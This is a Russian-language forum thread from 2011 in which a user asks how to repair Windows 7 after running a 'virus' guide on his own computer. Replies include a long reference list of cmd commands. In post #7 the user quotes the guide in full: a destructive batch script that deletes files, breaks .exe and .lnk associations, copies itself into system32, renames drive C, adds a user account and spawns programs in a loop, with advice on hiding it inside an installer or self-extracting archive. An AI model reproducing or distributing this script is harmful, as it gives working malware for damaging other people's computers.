• Страница 1 из 1
  • 1
Модератор форума: No_MaTTeR, Dimitro, LightInDarkness  
Как восстановить вистему,после последствий от вируса
dager13
Капрал
Как восстановить систему.после последствий очень похожего вируса*http://wowjp.net/forum/5-167750-1*кто поможет +сик!!вин 7

Сообщение # 1 написано 25.10.2011 в 15:53
mertccc
·-Повелитель багов-·
неудачный эксперимент ? biggrin
Сообщение # 2 написано 25.10.2011 в 15:58
dager13
Капрал
mertccc, да,плиз подскажи не шарю я в этой 7!

Сообщение # 3 написано 25.10.2011 в 16:01
mertccc
·-Повелитель багов-·
ну дак а какой именно батник ты сделал ?
Сообщение # 4 написано 25.10.2011 в 16:03
dager13
Капрал
по гайду http://wowjp.net/forum/5-167750-1

Сообщение # 5 написано 25.10.2011 в 16:11
mertccc
·-Повелитель багов-·
омг... как иногда бывает сложно помочь wacko

Quote (st3n007)
ASSOC - Отображает или модифицирует связи расширений файлов
AT - Планирует команды и программы для выполнения на компьютере.
ATTRIB - Отображает или изменяет атрибуты файла.
BREAK - Устанавливает или отменяет проверку комбинации [Ctrl+C].
CACLS - Отображает или модифицирует списки управления доступом (ACLs) для файлов.
CALL - Вызывает один *.BAT-файл из другого.
CD - Отображает имя или изменяет имя текущей директории.
CHCP - Отображает или устанавливает номер активной кодовой страницы.
CHDIR - Отображает имя или изменяет имя текущей директории.
CHKDSK - Проверяет диск и отображает отчет о состоянии.
CLS - Очищает экран.
CMD - Стартует новый экземпляр интерпретатора команд Windows NT.
COLOR - Устанавливает цвета по умолчанию для переднего и заднего плана консоли.
COMMAND - Стартует новую копию интерпретатора команд Windows.
COMP - Сравнивает содержимое двух файлов или установки файлов.
COMPACT - Отображает или видоизменяет сжатие файлов на патрициях Windows NT(NTFS).
CONVERT - Конвертирует FAT томов к формату файловой системы Windows NT(NTFS). Вы не можете конвертировать текущий диск.
COPY - Копирует один или больше файлов на другое место.
CTTY - Изменяет терминальное устройство, используемое для управления вашей системой.
DATE - Отображает или устанавливает дату.
DEL - Удаляет один или более файлов.
DEBUG - Выполняет отладку, тестирование программ и редактирование инструментальных средств.
DIR - Отображает список файлов и поддиректорий в директории.
DISKCOMP - Сравнивает содержимое двух дискет.
DISKCOPY - Копирует содержимое одной дискеты на другую.
DOSKEY - Редактирует командные строки, восстанавливает команды Windows и создает макрос.
ECHO - Отображает сообщения, или включает/выключает вывод команд.
EMM386 - Включает/выключает поддержку расширенной памяти EMM386.
ENDLOCAL - Заканчивает локализацию изменений окружающей среды в *.BAT-файле.
ERASE - Удаляет один или более файлов.
EXIT - Прекращает выполнение программы (интерпретатор команд).
EXTRACT - Средство извлечения информации из CAB - файлов.
FC - Сравнивает два файла или установки файлов, и отображает различие между ними.
FIND - Ищет текстовую строку в файле или файлах.
FINDSTR - Поиск строк в файлах.
FOR - Выполняет указанную команду для каждого файла в наборе файлов.
FORMAT - Форматирует диск для использования с Windows.
FTYPE - Отображает или модифицирует типы файлов, используемых в связях расширений.
GOTO - Направляет интерпретатор команд Windows NT к помеченной строке в *.BAT-файле.
GRAFTABL - Способность Windows отображать символы псевдографики, вставленные в графическом режиме.
HELP - Обеспечивает информацию Help для команд Windows.
IF - Выполняет обработку условия в *.BAT-файле.
KEYB - Конфигурирует клавиатуру для заданного языка.
LABEL - Создает, изменяет, или удаляет метку тома на диске.
LOADHIGH(LH) - Загружает программу в верхние адреса памяти.
MD - Создает директорию.
MEM - Отображает величину используемой и свободной памяти в вашей системе.
MKDIR - Создает директорию.
MODE - Конфигурирует системное устройство.
MORE - Отображает вывод одного экрана за раз.
MOVE - Перемещает один или более файлов из одной директории в другую на том же диске.
NETSTAT - Отображает статистики протоколов и текущих сетевых соединений TCP/IP.
NLSFUNC - Загружает информацию, специфическую для страны.
PATH - Отображает или устанавливает путь поиска для выполняемых файлов.
PAUSE - Приостанавливает обработку *.BAT-файла и отображает сообщение.
POPD - Восстанавливает предыдущее значение текущей директории, сохраненной по PUSHD.
PRINT - Печатает текстовый файл.
PROMPT - Изменяет подсказку к командам Windows.
PUSHD - Сохраняет текущую директорию, потом изменяет.
RD - Удаляет директорию.
RECOVER - Восстанавливает читаемую информацию с плохого или дефектного диска.
REM - Записывает комментарии (примечания) в *.BAT-файлы или CONFIG.SYS.
REN - Переименует файл или файлы.
RENAME - Переименует файл или файлы.
REPLACE - Заменяет файлы.
RESTORE - Восстанавливает файлы, которые были архивированы с использованием команды BACKUP.
RMDIR - Удаляет директорию.
SET - Отображает, устанавливает или удаляет переменные среды Windows.
SETLOCAL - Начинает локализацию изменений среды в *.BAT-файле.
SETVER - Устанавливает номер версии MS-DOS, который Windows сообщает программе.
SHIFT - Сдвигает позицию замещаемых параметров в *.BAT-файле.
SMARTDRV - Инсталлирует и конфигурирует утилиту кэширования диска SMART - драйва.
SORT - Сортирует входной поток.
START - Стартует отдельное окно для выполнения указанной программы или команды.
SUBST - Связывает путь с литерой диска.
SYS - Копирует файлы системы MS-DOS и интерпретатор команд на указанный вами диск.
TIME - Отображает или устанавливает системное время.
TITLE - Устанавливает заголовок окна для сеанса .
TREE - Графически отображает структуру директория в драйве или путь.
TYPE - Отображает содержимое текстового файла.
VER - Отображает версию Windows.
VERIFY - Сообщает Windows, проверять ли правильность записи файлов на диск.
VOL - Отображает метку дискового тома и серийный номер.
XCOPY - Копирует файлы и деревья директории.


какую из этих команды ты написал в батник ?
Сообщение # 6 написано 25.10.2011 в 16:20
dager13
Капрал
не писал,выполнил гайд
Code
Сейчас я вас научу создавать вирусы используя 1лишь блокнот  
  Чтобы убедиться в том что блокнот не просто текстовый редактор откроем его и напишем:  
Start mspaint сохраним с расширением .bat откроем файл и через наш файлик откроется paint:)(так можно делать с любой программой,со стандартными программами можно не писать слово"start")  
  Но это просто баловство) начнём писать наш вирус)  
  Открываем наш любимый блокнот и пишим  
Label C: you hacked-данная команда переименует диск "C"  
  Можно изменить время и дату(антивир будет ругаться что закончилась лицуха)  
time 00:00-изменит время  
date 01.01.2034-изменит дату  
  Далее скопируем наш файлик;)  
Copy %0 C:\Windows\system32\YOU LAMER.bat-команда скопирует ваш файл по указаному пути(виндовс\систем32)  
del *.* /q-удалит все файлы в папке где находиться наш вирус;)(вирус тоже удалиться)  
  Теперь поубиваем пк;)  
assoc .exe=.mp3-будет запускать все екзешники как мп3 файлы;)  
assoc .lnk=.txt-открывает все ярлыки как текст(может не открыть вообще)  
  запустим пейнтов:D  
Start mspaint-сколько вставите столько и откроет наш файлик) (1пейнт-1строка:D)  
  после напишите:goto x;-забыл зачем,но лучше напишите:D  
  теперь понасаздаём папок(папки имеют вес правда маленький;) )  
  Пишем  
md 1  
  md 2  
  md 3  
  md 4  
  md 5  
  .....  
  (можно просто выделить в екселе строку,сколько вам надо,скопировать и вставить)  

  можно добавить пару юзеров  
  делаеться это командой  
net user "LAMER" /add  

  теперь сохраняем наш файлик в расширении .bat ;),но тут есть 1уязвимость если ваша жертва опытный юзер то он обязательно посмотрим ваш файлик через блокнот и увидит весь код вируса,чего мы не хотим:)  
  есть 2решения;привязать ваш вирус к какойнибудь проге и сделать инсталятор или сделать самораспоковывающийся архив(http://www.oszone.net/3171 сдесь вы можете прочитать про самораспаковывающийся архив)

Сообщение # 7 написано 25.10.2011 в 16:32
mertccc
·-Повелитель багов-·
наверное придется переустановить винду
Сообщение # 8 написано 25.10.2011 в 16:40
kapinos
Скаут
А какие последствия? что тебе сделал вирус с компом?
Этот неловкий момент, когда у вас 100
открытых вкладок и вы не можете
выяснить, из которой идет музыка...
Сообщение # 9 написано 25.10.2011 в 16:40
dager13
Капрал
да не че особова,просто поменял время дату,не запускаются программы(не удалось открыть фаил),поиск соотвествия в Интернете и т.д,мож кто знает?

Сообщение # 10 написано 25.10.2011 в 16:43
Kirsan
§¤Who is who¤§
Quote (dager13)
вистему

bag
Сообщение # 11 написано 25.10.2011 в 16:44
  • Страница 1 из 1
  • 1
Поиск: